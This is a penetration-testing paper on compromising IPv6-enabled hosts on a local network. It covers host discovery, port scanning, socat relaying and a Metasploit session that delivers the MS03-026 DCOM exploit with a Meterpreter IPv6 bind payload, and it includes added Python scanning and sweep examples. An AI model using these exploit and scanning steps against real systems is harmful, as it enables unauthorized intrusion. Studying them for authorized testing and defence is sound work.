Exploiting Tomorrow's Internet Today
Penetration Testing with IPv6
H D Moore <hdm[at]metasploit.com>

Introduction

Summary

This paper illustrates how IPv6-enabled systems with link-local and auto-configured addresses can be compromised using existing security tools. While most of the techniques described can apply to "real" IPv6 networks, the focus of this paper is IPv6-enabled systems on the local network.

Acknowledgments

The author would like to thank Van Hauser of THC for his excellent presentation at CanSecWest 2005 and for releasing the IPv6 Attack Toolkit. Much of the background information in this paper is based on notes from Van Hauser's presentation. The 'alive6' tool included with the IPv6 Attack Toolkit is the critical first step for all techniques described in this paper. The author would also like to thank Philippe Biondi for his work on Scapy and for his non-traditional 3-D presentation on IPv6 routing headers at CanSecWest 2007.

Background

The next iteration of the IP protocol, version 6, has been "just around the corner" for nearly 10 years. Migration deadlines have come and gone, networking vendors have added support, and all modern operating systems are IPv6-ready. The problem is that few organizations have any intention of implementing IPv6. The result is that most corporate networks contain machines that have IPv6 networking stacks but have never been intentionally configured for IPv6. That stack is an attack surface that is routinely overlooked in corporate environments. For example, many firewall products, such as ZoneAlarm on Windows and the standard iptables rules on Linux, do not block IPv6 traffic at all: iptables rules apply only to IPv4, and IPv6 is filtered by the separate ip6tables (Netfilter6) rule set, which is commonly left empty. The goal of this paper is to demonstrate how existing tools can be used to compromise IPv6-enabled systems.

Operating System

All tools described in this paper were launched from an Ubuntu Linux 8.04 system. If you are using Microsoft Windows, Mac OS X, BSD, or another Linux distribution, some tools may work differently or not at all.

Configuration

All examples in this paper depend on the host system having a working IPv6 stack along with a link-local or auto-configured IPv6 address. This requires IPv6 support to be compiled into the kernel or loaded as a kernel module. To determine whether your system has an IPv6 address configured on a particular interface, use the ifconfig command (newer distributions report the same information with ip -6 addr show dev eth0):

# ifconfig eth0 | grep inet6
inet6 addr: fe80::0102:03ff:fe04:0506/64 Scope:Link

Addressing

IPv6 addresses consist of 128 bits (16 bytes) and are written as eight groups of four hex digits separated by colons. A double colon ("::") indicates that the bits leading up to the next part of the address are all zero. For example, the loopback/localhost address consists of 15 NULL bytes followed by one byte set to 0x01; its representation is simply "::1" (the IPv4 equivalent is 127.0.0.1). The "any" address is written "::0" or just "::" (IPv4 0.0.0.0). Link-local addresses always start with the prefix fe80:: followed by an interface identifier, normally derived from the MAC address in modified EUI-64 form. Auto-configured addresses take whatever prefix the local router advertises; global unicast space is currently allocated from 2000::/3, which is why this paper refers to the "2000::" prefix. The "::" sequence can appear only once within an address (it would be ambiguous otherwise). The following examples demonstrate how it is used:

0000:0000:0000:0000:0000:0000:0000:0000 == ::, ::0, 0::0, 0:0::0:0
0000:0000:0000:0000:0000:0000:0000:0001 == ::1, 0::1, 0:0::0:0001
fe80:0000:0000:0000:0000:0000:0000:0060 == fe80::60
fe80:0000:0000:0000:0102:0304:0506:0708 == fe80::0102:0304:0506:0708

Link-local vs Site-local

On a given local network, every IPv6 node has at least one link-local address (fe80::/64). During automatic configuration of a network adapter, a link-local address is chosen and a router solicitation is sent to the all-routers multicast address (ff02::2). If an IPv6-enabled router answers with a router advertisement, the node also configures an address from the advertised prefix on that interface. This paper calls that a "site-local" address, although the genuine site-local range (fec0::/10) has been deprecated and what a router hands out today is normally a global 2000::/3 prefix. Flags in the router advertisement indicate whether the node should obtain the address through DHCPv6 or build it itself (stateless auto-configuration, by default with the EUI-64 algorithm). On networks with no active IPv6 router, an attacker can answer the solicitation instead and force every local IPv6 node to configure an address from a prefix of the attacker's choosing.

Discovery

Scanning

Unlike the IPv4 address space, the IPv6 address space cannot feasibly be probed sequentially to discover live systems. In real deployments each subnet is normally assigned a /64, a 64-bit host range. Only one or two active nodes may exist inside that range, but the range itself is over four billion (2^32) times the size of the entire IPv4 Internet. Discovering live systems with sequential probes across a /64 would require up to 18,446,744,073,709,551,616 packets.

Management

In order to manage hosts within large IPv6 network ranges, DNS and other naming services are absolutely required. Administrators may be able to remember an IPv4 address within a subnet, but tracking a 64-bit host ID within a local subnet is a challenge. Because of this, DNS, WINS, and other name services are critical for managing the addresses of IPv6 hosts. Since the focus of this paper is on "accidental" IPv6 networks, it does not cover IPv6 discovery through host management services.

Neighbor Discovery

The IPv4 ARP protocol goes away in IPv6. Its replacement is ICMPv6 Neighbor Discovery (ND), whose Neighbor Solicitation (NS) and Neighbor Advertisement messages take the place of ARP requests and replies. Neighbor Discovery lets an IPv6 host learn the link-local and auto-configured addresses of the other IPv6 systems on the local network, and a Neighbor Solicitation determines whether a given IPv6 address exists on the local link.
The link-local address is guaranteed to be unique per host, per link, by deriving it from the interface's hardware address with the modified EUI-64 algorithm: the six-byte MAC is split in half, ff:fe is inserted between the halves, and the universal/local bit (0x02 in the first octet) is inverted to produce an eight-byte interface identifier. A system with a hardware MAC of 01:02:03:04:05:06 therefore uses the link-local address fe80::0302:03ff:fe04:0506, and the ip neigh output below shows the same inversion (00:11:43:... becomes ...211:43ff:...). Because the mapping is reversible, a link-local address built this way reveals the MAC, and with it the adapter vendor. Newer stacks (Windows Vista and later by default, and Linux or Mac OS X systems with privacy extensions enabled) use randomly generated interface identifiers for some or all of their addresses, so this is not always the case. In addition to link-local addresses, IPv6 also supports stateless auto-configuration of router-advertised (in this paper, "2000::") prefixes using the same interface identifier. More information about Neighbor Discovery can be found in RFC 2461.

The IPv6 Attack Toolkit

In order to enumerate local hosts using the Neighbor Discovery protocol, we need a tool which can send ICMPv6 probes and listen for responses. The alive6 program included with Van Hauser's IPv6 Attack Toolkit is the tool for the job. The example below demonstrates how to use alive6 to discover IPv6 hosts attached to the network on the eth0 interface:

# alive6 eth0
Alive: fe80:0000:0000:0000:xxxx:xxff:fexx:xxxx
Alive: fe80:0000:0000:0000:yyyy:yyff:feyy:yyyy
Found 2 systems alive

Linux Neighbor Discovery Tools

The 'ip' command, in conjunction with 'ping6', both included with most recent Linux distributions, can also be used to perform local IPv6 node discovery: a ping of the all-nodes multicast address makes every node on the link answer, and the kernel's neighbor cache then holds their link-local addresses and MACs. The following commands demonstrate this method:

# ping6 -c 3 -I eth0 ff02::1 >/dev/null 2>&1
# ip neigh | grep ^fe80
fe80::211:43ff:fexx:xxxx dev eth0 lladdr 00:11:43:xx:xx:xx REACHABLE
fe80::21e:xxff:fexx:xxxx dev eth0 lladdr 00:1e:xx:xx:xx:xx REACHABLE
fe80::218:8xff:fexx:xxxx dev eth0 lladdr 00:18:8x:xx:xx:xx REACHABLE
[...]
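The EUI-64 derivation and the ip neigh listing above, worked in Python as an added example (this is not code from the paper or from the THC toolkit): it builds the link-local address from a MAC with the universal/local bit inverted, recovers the MAC from an observed address where that is possible, and cross-checks neighbor-cache lines against their lladdr. SAMPLE_NEIGH is constructed data in the format ip -6 neigh prints, not a real capture.

```python
"""Modified EUI-64 (RFC 4291 appendix A) in both directions, plus a parser for
`ip -6 neigh` output that flags entries whose address does not match the MAC.
Added example for this page; not code from the paper or from the THC toolkit.
SAMPLE_NEIGH is constructed data, not a real capture."""
import ipaddress
import re


def mac_to_link_local(mac):
    """fe80::/64 address for a 48-bit MAC: split the MAC in half, insert
    ff:fe, and invert the universal/local bit (0x02) of the first octet."""
    octets = bytes.fromhex(mac.replace(":", "").replace("-", ""))
    if len(octets) != 6:
        raise ValueError("expected a 48-bit MAC address")
    iid = bytes([octets[0] ^ 0x02]) + octets[1:3] + b"\xff\xfe" + octets[3:6]
    return str(ipaddress.IPv6Address(b"\xfe\x80" + b"\x00" * 6 + iid))


def link_local_to_mac(addr):
    """Inverse mapping. Returns None when the interface identifier was not
    built by EUI-64 (privacy or random IIDs carry no ff:fe marker)."""
    iid = ipaddress.IPv6Address(addr.split("%", 1)[0]).packed[8:]
    if iid[3:5] != b"\xff\xfe":
        return None
    octets = bytes([iid[0] ^ 0x02]) + iid[1:3] + iid[5:8]
    return ":".join(f"{b:02x}" for b in octets)


# "<addr> dev <if> lladdr <mac> [router] [<flags>] <STATE>"
NEIGH_RE = re.compile(r"^(\S+) dev (\S+) lladdr (\S+)\s+(.*)$")


def parse_ip_neigh(output):
    """One dict per neighbor-cache entry that has a link-layer address.
    eui64_matches is False when the IPv6 address and lladdr disagree, which
    happens with random IIDs but also with a spoofed neighbor entry."""
    rows = []
    for line in output.splitlines():
        m = NEIGH_RE.match(line.strip())
        if not m:
            continue  # entries without lladdr (FAILED/INCOMPLETE) are skipped
        addr, dev, lladdr, rest = m.groups()
        flags = rest.split()
        rows.append({
            "addr": addr,
            "dev": dev,
            "lladdr": lladdr.lower(),
            "router": "router" in flags,
            "state": flags[-1],
            "eui64_matches": link_local_to_mac(addr) == lladdr.lower(),
        })
    return rows


# Constructed sample in the format `ip -6 neigh` prints on Linux.
SAMPLE_NEIGH = """\
fe80::211:43ff:feaa:bbcc dev eth0 lladdr 00:11:43:aa:bb:cc REACHABLE
fe80::21e:c2ff:fe11:2233 dev eth0 lladdr 00:1e:c2:11:22:33 STALE
fe80::dead:beef:cafe:f00d dev eth0 lladdr 00:18:8b:44:55:66 REACHABLE
fe80::1 dev eth0 lladdr 00:00:5e:00:01:01 router STALE
fe80::9 dev eth0 FAILED
"""

if __name__ == "__main__":
    print(mac_to_link_local("01:02:03:04:05:06"))
    for row in parse_ip_neigh(SAMPLE_NEIGH):
        mark = "ok" if row["eui64_matches"] else "MAC not derivable from address"
        print(f'{row["addr"]:28} {row["lladdr"]} {row["state"]:10} {mark}')
```

Feed real output in with something like parse_ip_neigh(subprocess.check_output(["ip", "-6", "neigh"], text=True)); an entry whose address and lladdr disagree is either a host with random interface identifiers or a neighbor cache entry somebody planted, and both are worth a second look.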
Local Broadcast Addresses

IPv6 Neighbor Discovery relies on a set of well-known addresses in order to reach all local nodes of a given type. Strictly, IPv6 has no broadcast: these are multicast groups (RFC 4291 section 2.7), but since every node on the link listens to them they behave like the IPv4 broadcast address, and this paper refers to them as broadcast addresses. The table below enumerates the most useful of them.

ff01::1  all node-local (interface-local) IPv6 nodes
ff02::1  all link-local IPv6 nodes
ff05::1  all site-local IPv6 nodes
ff01::2  all node-local (interface-local) IPv6 routers
ff02::2  all link-local IPv6 routers
ff05::2  all site-local IPv6 routers

IPv4 vs IPv6 Broadcasts

The IPv4 protocol allowed packets destined to network (directed) broadcast addresses to be routed across the Internet. While this had some legitimate uses, the feature was abused for years by traffic amplification attacks, which spoofed a query to a broadcast address from a victim in order to saturate the victim's bandwidth with the responses. While some IPv4 services were designed to work with broadcast addresses, this is the exception and not the norm. With the introduction of IPv6, these link-scope addresses are no longer routed outside of the local network. This mitigates traffic amplification attacks, but also prevents a host from sending Neighbor Discovery probes into remote networks.

One of the major differences between IPv4 and IPv6 is how network services which listen on the "any" address (0.0.0.0 / ::0) handle incoming requests destined to the broadcast address. A good example is the BIND DNS server. When using IPv4 and listening on 0.0.0.0, DNS requests sent to the network broadcast address are simply ignored. When using IPv6 and listening on ::0, DNS requests sent to the link-local all-nodes address (ff02::1) are processed. This allows a local attacker to send a message to every BIND server on the local network with a single packet. The same technique works for any other UDP-based service bound to the ::0 address of an IPv6-enabled interface. (On a host with more than one interface the scope must be given, e.g. @ff02::1%eth0.)

# dig metasploit.com @ff02::1
;; ANSWER SECTION:
metasploit.com.  3600  IN  A  216.75.15.231
;; SERVER: fe80::xxxx:xxxx:xxxx:xxxx#53(ff02::1)
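The single-packet sweep described above, as an added Python example (not code from the paper or from Metasploit): one DNS query is sent to ff02::1 on a chosen interface and every link-local address that answers is recorded, which is what the dig command and the sweep_udp module achieve. The interface name is supplied by the caller, and RESPONSE_SAMPLE is a hand-built packet so the builder and parser can be checked without a network.

```python
"""Probe every node on a link with one DNS query to ff02::1 and record which
link-local addresses answer. Same effect as the page's `dig @ff02::1` and the
Metasploit sweep_udp module. Added example for this page, not code from the
paper or from Metasploit. The interface name is supplied by the caller;
RESPONSE_SAMPLE is a constructed packet so the parser can be checked offline."""
import socket
import struct
import time

TXID = 0x1234  # fixed transaction id so stray datagrams can be rejected


def build_dns_query(name, txid=TXID):
    """Standard recursive query, one question, type A, class IN (RFC 1035 4.1)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.rstrip(".").split("."))
    return header + qname + b"\x00" + struct.pack("!HH", 1, 1)


def parse_dns_reply(data, txid=TXID):
    """Return (rcode, answer_count) for a response to our query, else None."""
    if len(data) < 12:
        return None
    rid, flags, _qd, ancount, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    if rid != txid or not flags & 0x8000:  # wrong id, or QR bit clear
        return None
    return flags & 0x000F, ancount


def probe_all_nodes(iface, name="example.com", wait=2.0):
    """Send the query to ff02::1 on `iface` and collect responders.
    Any resolver bound to [::]:53 on the link answers, so the result maps
    link-local address -> (rcode, answer_count)."""
    index = socket.if_nametoindex(iface)
    query = build_dns_query(name)
    responders = {}
    with socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) as s:
        # Link-scope multicast needs an explicit outgoing interface.
        s.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_MULTICAST_IF, index)
        s.settimeout(wait)
        s.sendto(query, ("ff02::1", 53, 0, index))
        deadline = time.monotonic() + wait
        while time.monotonic() < deadline:
            try:
                data, (src, _port, _flow, _scope) = s.recvfrom(4096)
            except socket.timeout:
                break
            parsed = parse_dns_reply(data)
            if parsed is not None:
                responders[src.split("%", 1)[0] + "%" + iface] = parsed
    return responders


# Constructed response: id 0x1234, flags 0x8180 (QR, RD, RA), one question
# and one A record for example.com (rdata 93.184.216.34, TTL 3600).
RESPONSE_SAMPLE = (
    b"\x12\x34\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00"
    b"\x07example\x03com\x00\x00\x01\x00\x01"
    b"\xc0\x0c\x00\x01\x00\x01\x00\x00\x0e\x10\x00\x04\x5d\xb8\xd8\x22"
)

if __name__ == "__main__":
    import sys
    for host, (rcode, answers) in probe_all_nodes(sys.argv[1]).items():
        print(f"{host}: DNS rcode={rcode} answers={answers}")
```

Run it as python3 probe.py eth0 on a link where you have an IPv6 address; no privileges are needed because it is a plain UDP socket. A resolver that refuses recursion still shows up (rcode 5, zero answers), which is the point: the reply itself, not its content, identifies the listener.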
Services

Using Nmap

The Nmap port scanner supports IPv6 targets; however, the versions current at the time of writing (4.x) can only scan them through the native networking libraries and cannot send raw IPv6 packets. This limits TCP port scans to the "connect()" method, which, while effective, is slow against firewalled hosts and requires a full TCP connection to identify each open port. (Nmap 6 and later added raw-packet IPv6 scanning, including SYN scans and OS detection, so this limitation does not apply to current releases.) Even with these limitations, Nmap is still the tool of choice for IPv6 port scanning. Older versions of Nmap did not support scanning link-local addresses, because these require an interface suffix. Trying to scan a link-local address would result in the following error:

# nmap -6 fe80::xxxx:xxxx:xxxx:xxxx
Starting Nmap 4.53 ( http://insecure.org ) at 2008-08-23 14:48 CDT
Strange error from connect (22):Invalid argument

The problem is that link-local addresses are interface specific. In order to talk to the host at fe80::xxxx:xxxx:xxxx:xxxx, we must also indicate which interface it is on. On Linux this is done by appending a "%" followed by the interface name to the address; in this case we would specify "fe80::xxxx:xxxx:xxxx:xxxx%eth0". Recent versions of Nmap (4.68) support the interface suffix and have no problem scanning link-local IPv6 addresses. Router-advertised ("site-local") addresses do not require a scope ID suffix, which makes them a little easier to use from an attacker's perspective (reverse connect code doesn't need to know the scope ID, just the address).

# nmap -6 fe80::xxxx:xxxx:xxxx:xxxx%eth0
Starting Nmap 4.68 ( http://nmap.org ) at 2008-08-27 13:57 CDT
PORT   STATE SERVICE
22/tcp open  ssh
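What the scope ID does at the socket level, as an added Python example (not code from Nmap or Metasploit): a connect()-style TCP scan in the same spirit as the scans above, which accepts a link-local target with a "%interface" suffix, carries the interface index in the AF_INET6 socket address, and rejects a scope-less link-local literal up front instead of failing with the "Invalid argument" error shown. The demo function scans the host's own IPv6 loopback so the code can be exercised without a target; interface names in the comments are placeholders.

```python
"""connect()-style TCP port scan of an IPv6 target, including link-local
targets that carry a scope ID. Added example for this page, not code from
Nmap or Metasploit; interface names in the comments are placeholders."""
import socket
import sys
from concurrent.futures import ThreadPoolExecutor


def parse_target(spec):
    """'fe80::1%eth0' -> ('fe80::1', <index of eth0>); '2001:db8::1' -> (..., 0).
    The scope may be an interface name or a numeric interface index. A
    link-local literal without a scope is rejected here, since the kernel
    cannot pick a link for it (the EINVAL behind older Nmap's error)."""
    addr, _, scope = spec.partition("%")
    packed = socket.inet_pton(socket.AF_INET6, addr)  # raises on a bad literal
    link_local = packed[0] == 0xFE and (packed[1] & 0xC0) == 0x80
    if not scope:
        if link_local:
            raise ValueError(f"{addr} is link-local: append %<interface>")
        return addr, 0
    index = int(scope) if scope.isdigit() else socket.if_nametoindex(scope)
    return addr, index


def probe(addr, index, port, timeout=1.0):
    """True when a full TCP handshake completes. The AF_INET6 sockaddr is
    (host, port, flowinfo, scope_id); scope_id tells the kernel which link
    an fe80:: destination lives on."""
    with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((addr, port, 0, index)) == 0


def connect_scan(spec, ports, timeout=1.0, workers=64):
    """Sorted list of open ports on `spec` for the given iterable of ports."""
    addr, index = parse_target(spec)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: (p, probe(addr, index, p, timeout)), ports))
    return sorted(p for p, is_open in results if is_open)


def demo_on_loopback():
    """Self-check without a target: listen on [::1], scan a small window of
    ports around the listener, return (listener_port, open_ports). Returns
    None when the host has no IPv6 loopback (IPv6 disabled)."""
    try:
        listener = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
    except OSError:
        return None
    with listener:
        try:
            listener.bind(("::1", 0))
            listener.listen(5)
        except OSError:
            return None
        port = listener.getsockname()[1]
        window = range(max(port - 2, 1), min(port + 3, 65536))
        return port, connect_scan("::1", window, timeout=0.5)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "::1"
    print(connect_scan(target, range(1, 1025)))
```

Usage: python3 scan.py 'fe80::24c:44ff:fe4f:1a44%eth0' (quote the argument, since % is special to some shells). As with Nmap's connect() scan, every open port leaves a completed handshake in the target's logs, and a host that silently drops SYNs costs a full timeout per port.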
Using Metasploit

The development version of the Metasploit Framework includes a simple TCP port scanner. This module accepts a list of hosts via the RHOSTS parameter and a start and stop port. The Metasploit Framework has full support for IPv6 addresses, including the interface suffix. The following example scans ports 1 through 10,000 on the target fe80::xxxx:xxxx:xxxx:xxxx connected via interface eth0. This target is a default install of Vista Home Premium (port 3389 is Remote Desktop and 5357 is the Vista Web Services on Devices listener).

# msfconsole
msf > use auxiliary/discovery/portscan/tcp
msf auxiliary(tcp) > set RHOSTS fe80::xxxx:xxxx:xxxx:xxxx%eth0
msf auxiliary(tcp) > set PORTSTART 1
msf auxiliary(tcp) > set PORTSTOP 10000
msf auxiliary(tcp) > run
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:135
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:445
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1025
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1026
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1027
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1028
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1029
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1040
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:3389
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:5357
[*] Auxiliary module execution completed

In addition to TCP port scanning, the Metasploit Framework also includes a UDP service detection module. This module sends a series of UDP probes to every host defined by RHOSTS and prints any responses received. It works with any IPv6 address, including the all-nodes multicast address. For example, the session below discovers a local DNS service that is listening on ::0 and responds to requests sent to ff02::1:

# msfconsole
msf > use auxiliary/scanner/discovery/sweep_udp
msf auxiliary(sweep_udp) > set RHOSTS ff02::1
msf auxiliary(sweep_udp) > run
[*] Sending 7 probes to ff02:0000:0000:0000:0000:0000:0000:0001 (1 hosts)
[*] Discovered DNS on fe80::xxxx:xxxx:xxxx:xxxx%eth0
[*] Auxiliary module execution completed

Exploits

IPv6 Enabled Services

When conducting a penetration test against an IPv6-enabled system, the first step is to determine what services are accessible over IPv6. The previous section described some of the tools available for doing this, but did not cover the differences between the IPv4 and IPv6 interfaces of the same machine. Consider the Nmap results below: the first set is from scanning the IPv6 interface of a Windows 2003 system, while the second is from scanning the same system's IPv4 address.
# nmap -6 -p1-10000 -n fe80::24c:44ff:fe4f:1a44%eth0
80/tcp    open  http
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
554/tcp   open  rtsp
1025/tcp  open  NFS-or-IIS
1026/tcp  open  LSA-or-nterm
1027/tcp  open  IIS
1030/tcp  open  iad1
1032/tcp  open  iad3
1034/tcp  open  unknown
1035/tcp  open  unknown
1036/tcp  open  unknown
1755/tcp  open  wms
9464/tcp  open  unknown

# nmap -sS -p1-10000 -n 192.168.0.147
25/tcp    open  smtp
42/tcp    open  nameserver
53/tcp    open  domain
80/tcp    open  http
110/tcp   open  pop3
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
554/tcp   open  rtsp
1025/tcp  open  NFS-or-IIS
1026/tcp  open  LSA-or-nterm
1027/tcp  open  IIS
1030/tcp  open  iad1
1032/tcp  open  iad3
1034/tcp  open  unknown
1035/tcp  open  unknown
1036/tcp  open  unknown
1755/tcp  open  wms
3389/tcp  open  ms-term-serv
9464/tcp  open  unknown

Of the application services this Windows 2003 system exposes, only the IIS web server, the DCERPC/SMB ports and the streaming media services appear to be IPv6-enabled. The SMTP, POP3, DNS, WINS, NetBIOS, and RDP services were all missing from the scan of the IPv6 address (ports 25, 42, 53, 110, 139 and 3389 appear only in the IPv4 list). While this does limit the attack surface on the IPv6 interface, the remaining services are still significant in terms of exposure. The SMB port (445) allows access to file shares and remote API calls through DCERPC. All TCP DCERPC services are still available, including the endpoint mapper, which provides us with a list of DCERPC
applications on this system. The web server (IIS 6.0) is accessible, along with any applications hosted on it. The streaming media services RTSP (554) and MMS (1755) provide access to the streaming content and administrative interfaces.

IPv6 and Web Browsers

While most modern web browsers accept IPv6 addresses in the URL bar, there are complications. For example, with the Windows 2003 system above, we see that port 80 is open. To access this web server with a browser, we use the following URL:

http://[fe80::24c:44ff:fe4f:1a44%eth0]/

Unfortunately, while Firefox and Konqueror can process this URL, Internet Explorer (6 and 7) cannot. Since this is a link-local address, putting it in DNS does not help either: a AAAA record cannot carry the scope ID, so a hostname resolving to the address is unusable. An interesting difference between Firefox 3 and Konqueror is how the Host header is built when an IPv6 address and scope ID are specified. Firefox 3 sends the entire address, including the local scope ID, in the HTTP Host header, which causes IIS 6.0 to return an "invalid hostname" error to the browser. Konqueror strips the scope ID from the Host header, which avoids the error seen with Firefox.
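The Host-header problem above, handled explicitly, as an added Python example (not code from any browser, scanner or the paper): the URL parser accepts both the raw "%eth0" form used here and the "%25eth0" form RFC 6874 specifies, the zone goes into the socket address as the scope index, and the Host header carries the bracketed literal without the zone, which is the Konqueror behaviour that IIS 6.0 accepts. The demo function starts a small echo server on the host's own IPv6 loopback to show what the server sees; the address and interface in the docstrings are placeholders.

```python
"""HTTP request to a link-local IPv6 web server: the zone ID goes into the
socket address, never into the Host header (IIS 6.0 rejects a Host value
containing '%eth0', as the page observes; RFC 6874 section 4 says not to send it).
Added example for this page, not code from any browser or scanner; the
address and interface in the docstrings are placeholders."""
import re
import socket
import socketserver
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# http://[<addr>%<zone>]:<port>/<path>; the zone may be written %eth0 or %25eth0
URL_RE = re.compile(r"^http://\[([0-9a-fA-F:.]+)(?:%(?:25)?([^\]]+))?\](?::(\d+))?(/.*)?$")


def parse_ipv6_url(url):
    """'http://[fe80::24c:44ff:fe4f:1a44%eth0]/x' ->
    ('fe80::24c:44ff:fe4f:1a44', 'eth0', 80, '/x'); zone is None if absent."""
    m = URL_RE.match(url)
    if not m:
        raise ValueError("not a bracketed IPv6 http URL: " + url)
    addr, zone, port, path = m.groups()
    return addr, zone, int(port) if port else 80, path or "/"


def host_header(addr, port):
    """Host value for an IPv6 literal: brackets, zone stripped, port only
    when it is not the default."""
    return f"[{addr}]" + (f":{port}" if port != 80 else "")


def scope_index(zone):
    """Interface name or numeric index -> scope_id for the sockaddr."""
    if zone is None:
        return 0
    return int(zone) if zone.isdigit() else socket.if_nametoindex(zone)


def http_get(url, timeout=5.0):
    """Minimal GET over a raw socket; returns (status_code, body_bytes)."""
    addr, zone, port, path = parse_ipv6_url(url)
    request = (f"GET {path} HTTP/1.1\r\nHost: {host_header(addr, port)}\r\n"
               "Connection: close\r\n\r\n").encode("ascii")
    with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        s.connect((addr, port, 0, scope_index(zone)))  # zone lives here only
        s.sendall(request)
        chunks = []
        while True:
            data = s.recv(65536)
            if not data:
                break
            chunks.append(data)
    head, _, body = b"".join(chunks).partition(b"\r\n\r\n")
    return int(head.split(b" ", 2)[1]), body


class _EchoHostHandler(BaseHTTPRequestHandler):
    """Demo server: replies with the Host header it received."""
    def do_GET(self):
        body = self.headers.get("Host", "").encode("ascii")
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the demo quiet


class _IPv6HTTPServer(HTTPServer):
    address_family = socket.AF_INET6

    def server_bind(self):
        socketserver.TCPServer.server_bind(self)  # skip the reverse DNS lookup


def demo_on_loopback():
    """Serve on [::1], fetch through http_get, return (status, host_seen, port),
    or None when the host has no IPv6 loopback."""
    try:
        server = _IPv6HTTPServer(("::1", 0), _EchoHostHandler)
    except OSError:
        return None
    port = server.server_address[1]
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        status, body = http_get(f"http://[::1]:{port}/")
        return status, body.decode("ascii"), port
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(demo_on_loopback())
```

Against the Windows 2003 host this would be http_get("http://[fe80::24c:44ff:fe4f:1a44%eth0]/"). The same split applies to any tool that builds its own requests: the zone belongs to the local socket, and a server has no use for it.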
IPv6 and Web Assessments

One of the challenges with assessing IPv6-enabled systems is making existing security tools work with the IPv6 address format (especially the local scope ID). For example, the Nikto web scanner is an excellent tool for web assessments, but it has no direct support for IPv6 addresses. While we can add an entry to /etc/hosts for the IPv6 address we want to scan and pass that name to Nikto, Nikto is unable to process the scope ID suffix. The solution to this and many other tool compatibility issues is a TCPv4-to-TCPv6 proxy. By far the easiest tool for the job is socat, which is available as a package on most Linux and BSD distributions. To relay local port 8080 to remote port 80 on a link-local IPv6 address, we use a command like the one below:

# socat TCP-LISTEN:8080,reuseaddr,fork TCP6:[fe80::24c:44ff:fe4f:1a44%eth0]:80

Once socat is running, we can launch Nikto and many other tools against port 8080 on 127.0.0.1. Note that the target now receives a Host header of 127.0.0.1 (or localhost) rather than its own name; if the server relies on name-based virtual hosts, set the Host header explicitly (Nikto's -vhost option) so that the right site is tested.

# ./nikto.pl -host 127.0.0.1 -port 8080
- Nikto v2.03/2.04
---------------------------------------------------------------------------
+ Target IP:       127.0.0.1
+ Target Hostname: localhost
+ Target Port:     8080
+ Start Time:      2008-10-01 12:57:18
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/6.0

This port forwarding technique works for many other tools and protocols and is a great fall-back when the tool of choice does not support IPv6 natively.

Exploiting IPv6 Services

The Metasploit Framework has native support for IPv6 sockets, including the local scope ID. This allows nearly all of the exploit and auxiliary modules to be used against IPv6 hosts with no modification. In the case of web application exploits, the VHOST parameter can be used to override the Host header sent by the module, avoiding issues like the one described above.

IPv6 Enabled Shellcode

To restrict all exploit activity to the IPv6 protocol, not only do the exploits need support for IPv6, but the payloads as well. IPv6 payload support is available in Metasploit through the use of "stagers". These stagers can chain-load any of the common Windows payloads included with the Metasploit Framework. Once again, link-local addresses make this process a little more complicated. When using the bind_ipv6_tcp stager to open a listening port on the target machine, the RHOST parameter must have the local scope ID appended. By the same token, the reverse_ipv6_tcp stager requires that the LHOST variable have the remote machine's interface index appended as a scope ID: the payload runs on the target, so the scope index it needs is the target's, not the attacker's. This can be tricky, since the attacker rarely knows which interface index a given link-local address corresponds to on the remote side. For this reason, the bind_ipv6_tcp stager is ultimately more useful for exploiting Windows machines with
link-local addresses. The example below demonstrates using the bind_ipv6_tcp stager with the Meterpreter stage. The exploit in this case is MS03-026 (the vulnerability used by the Blaster worm) and is delivered over the DCERPC endpoint mapper service on port 135.

msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set RHOST fe80::24c:44ff:fe4f:1a44%eth0
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_ipv6_tcp
msf exploit(ms03_026_dcom) > set LPORT 4444
msf exploit(ms03_026_dcom) > exploit
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:[...]
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:[...][135]
[*] Sending exploit ...
[*] The DCERPC service did not reply to our request
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73227 bytes)...
[*] Upload completed.
